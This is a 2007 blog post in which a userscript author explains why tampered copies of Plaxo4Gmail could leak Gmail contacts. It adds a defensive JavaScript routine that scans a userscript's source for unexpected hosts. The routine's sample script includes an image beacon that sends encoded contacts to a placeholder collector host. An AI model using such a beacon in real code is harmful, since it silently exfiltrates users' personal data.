Sunday, January 7, 2007

Security Issues and me... and you!

Is Plaxo4Gmail a security risk? My answer: yes, and here is why.

When you run this script, it shares your contacts with another site. If you got an unauthorized copy from anywhere EXCEPT this website, the script could have been altered to send your contacts to a different site.

So don't install this script if you can't understand the code. This was first brought to my attention on the Google Blogscoped site from this entry. Practice safe hex. Always trust who you are getting your code from. If you don't trust me (and why should you?), don't use the script.
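One way to start reading a copy before installing it is to list every host its source mentions and compare that list with the sites you expect it to talk to. The sketch below is an added example, not code from Plaxo4Gmail; the sample userscript, its hosts and the allowlist are constructed placeholders.

```javascript
// Constructed sample userscript: one expected sync endpoint plus one
// extra destination of the kind an altered copy might contain.
const SAMPLE_SCRIPT = `
// ==UserScript==
// @name     Contact Sync (constructed sample)
// @include  https://mail.example.com/*
// ==/UserScript==
GM_xmlhttpRequest({
  method: "POST",
  url: "https://sync.example.net/import",
  data: contacts
});
var img = new Image();
img.src = "//collector.example.org/c?d=" + encodeURIComponent(contacts);
`;

// Collect the host of every absolute or protocol-relative URL in the source.
function extractHosts(source) {
  const re = /(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})(?::\d+)?/gi;
  const hosts = new Set();
  for (const m of source.matchAll(re)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts].sort();
}

// Compare the hosts found against the ones the reader expects (exact match,
// so an unlisted subdomain is reported rather than silently accepted).
function auditUserscript(source, expectedHosts) {
  const allowed = new Set(expectedHosts.map((h) => h.toLowerCase()));
  const found = extractHosts(source);
  return {
    found,
    unexpected: found.filter((h) => !allowed.has(h)),
  };
}

const report = auditUserscript(SAMPLE_SCRIPT, [
  "mail.example.com",
  "sync.example.net",
]);
console.log("hosts found:", report.found);
console.log("not on the expected list:", report.unexpected);
```

A scan like this only sees URLs written out literally; a destination assembled at run time will not appear, so an empty "unexpected" list narrows what you need to read but does not replace reading the code.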

That being said, I'd like to thank Plaxo and Mark Jen for the recent invite to beta test some of their unreleased sync products. I'm honored to be able to lend my assistance!

Update: 02/25/07
This illustrates what I mean by my original comments. Plaxo4Gmail does not use this hack, as my script does not have a cross-site scripting (XSS) issue. But I thought it was a good article and worth the read.